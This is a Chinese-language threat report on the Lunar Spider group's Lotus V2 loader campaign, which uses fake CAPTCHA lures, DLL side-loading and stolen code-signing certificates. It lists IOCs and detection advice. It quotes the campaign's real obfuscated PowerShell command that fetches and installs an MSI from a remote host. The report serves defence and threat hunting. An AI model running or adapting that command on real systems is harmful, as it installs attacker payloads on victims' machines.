Lunar Spider – 使用伪造CAPTCHA投递和DLL侧加载的Lotus V2加载器活动

Lunar Spider是一个以经济利益为动机的网络犯罪组织，至少自2017年以来一直活跃。该组织主要从事金融欺诈和访问权经纪，目标包括北美和欧洲的金融机构、企业和其他组织。

该组织最初因使用BokBot银行木马（也称为IcedID）而声名狼藉，后来逐步发展其工具集，加入了更高级的加载器如Bumblebee和Lotus V2。Lotus V2加载器专门设计用于隐蔽操作，促进第二阶段的载荷投递到受感染系统。

我们团队最近观察到的活动将Lunar Spider与涉及Lotus V2加载器的新投递活动联系起来，利用欺骗性技术绕过安全防御。

投递机制

该活动采用基于伪造CAPTCHA的投递策略，旨在诱使用户相信必须完成CAPTCHA验证才能继续浏览。这种交互会启动恶意PowerShell命令的执行。

观察到的PowerShell脚本滥用COM对象（WindowsInstaller.Installer）从远程服务器静默下载并执行恶意MSI包：

1

C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -Window Hidden -C "$s='WindowsInstaljer.Installer';$x=($s[0..12]+'l'+$s[14..$s.Length])-join'';$i=New-Object -ComObject $x;$i.UILevel=2;$i.InstallProduct('https://icwwk[.]com','')

执行

一旦MSI安装程序执行，它会将合法可执行文件安装到%APPDATA%目录。在一个观察到的案例中，这是一个有效的Intel Graphics二进制文件，放置在：

1

%APPDATA%\intel\igfxSDK.exe

SHA256: b7f8750851e70ec755343d322d7d81ea0fc1b12d4a1ab6a60e7c8605df4cd6a5

同时，一个名为WTSAPI32.dll的恶意DLL被投放到同一目录： SHA256: e798f2b3f7a44f5a9db7199964a0b5cc157db8cb1e84a3c8cbe721dbac0f0604

该二进制文件利用合法二进制文件使用的DLL搜索顺序，实现DLL侧加载。当igfxSDK.exe执行时，它会加载攻击者控制的DLL而不是合法的系统DLL。这导致嵌入在恶意DLL中的Lotus V2加载器执行。

在感染链的这一阶段，EDR解决方案未触发警报，可能是因为使用了受信任的二进制文件和恶意DLL的签名（尽管已撤销）证书，使操作保持隐蔽。

命令与控制（C2）

一旦执行，恶意DLL会启动与命令控制基础设施的出站通信。此活动源自受信任的进程igfxSDK.exe。在我们观察到的案例中，EDR阻止了网络回调并根据威胁情报签名发出警报。

滥用被盗证书

Lunar Spider操作员使用被盗或滥用的代码签名证书来签署恶意Lotus V2组件，通过使载荷显得可信进一步增强规避能力。

证书1：

• 主题 CN: LLC Xenit
• 序列号: 5631DCB283EC62ED3B96E8BE
• 指纹: C519277F61B1BE886D187A0C2E7909D694933250

关联的签名DLL（SHA256）：

• a66f6e35103338c25ee143c98a6f722c87a663610f147564f99b87468315a1f7
• ec29ce8537e112869dfccb8a57574ebd01eecd7ff5c9fff54fdc1b05ea8941b3
• e798f2b3f7a44f5a9db7199964a0b5cc157db8cb1e84a3c8cbe721dbac0f0604
• 405a5258b1f8c02ca45cfbcbcaba6152cf481665a160bc8971bbc837dc70a4c5
• 24d7cc12381e2502ac7fac42d2dbd1301b5dc1e0f6e797a62fac56dc570438dd

关联的C2域名：

• higtwebgenis[.]com
• safewithusres[.]com
• fide45felhs[.]com
• kiprihorycom[.]com
• visafropik[.]com
• valifoprofsto[.]com

证书2：

• 主题 CN: Wuxi Weitai Nano Technology Co., Ltd.
• 序列号: 5F36FF3EFCF0620ED7D1FD6C
• 指纹: DAD62095A80EEA1E6DECF91F957E59BA562B27A1

关联的签名DLL（SHA256）：

• 35e60a0107b9e56d6bec9b504a4e3396a580c8c7cabf317e23c78ffe2b3686a0
• 5070cc64b72062e18baa2ba164e1fef9d9a57a9962a64738d8405cd8c3af5101
• 3b2b5b486cc4229c8c43db8d7f74c2e1c0d0f1665b927e9d649dab838c682ac1
• 149309f9183b9baa2bd4db6df52873efdeefa3315ed158843cabcba149bec880
• 69af1d10dd1dacae362ab8fd4e5bcc97ddb363cdeb06a4bf1bc3db4dfc68b1e1

关联的C2域名：

• prot12-05[.]com
• domtrst455[.]com
• pros0512[.]com
• prot2-0512[.]com
• daringdesigners[.]com

Lunar Spider的检测与狩猎

为了补充EDR覆盖范围，持续的威胁狩猎和实施自定义检测规则对于维护安全至关重要，特别是在警报被遗漏或系统可见性存在差距的情况下。

• 使用LOLBins监控运行对话框活动：跟踪从运行对话框启动的living-off-the-land二进制文件（LOLBins），如powershell.exe、msiexec.exe和cmd.exe。监控注册表键的更改：HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

• 检测来自远程位置的MSI安装程序：搜寻从外部源安装MSI包的情况。检查EDR遥测和Windows事件日志，查找引用HTTP(S) URL作为安装源的msiexec进程。

• 实施DLL劫持检测逻辑：监控使用已知易受攻击二进制文件的DLL侧加载尝试。使用社区资源HijackLibs识别常被滥用的可执行文件，并在其目录路径中围绕意外的DLL加载构建检测。

• 摄取并操作化威胁情报源：将高置信度的威胁情报源集成到检测管道中。基于危害指标（IOCs）创建警报或狩猎查询，例如与Lunar Spider活动相关的已知恶意域、IP或证书指纹。

• 利用EDR进行基于证书的透视：一些EDR平台允许分析人员根据签名证书元数据进行透视。使用此功能追踪使用滥用或被盗证书签名的恶意二进制文件，与已知威胁行为者基础设施或先前观察到的恶意软件变体相关联。

MITRE ATT&CK TTPs（战术、技术和程序）表基于Lunar Spider – Lotus V2加载器活动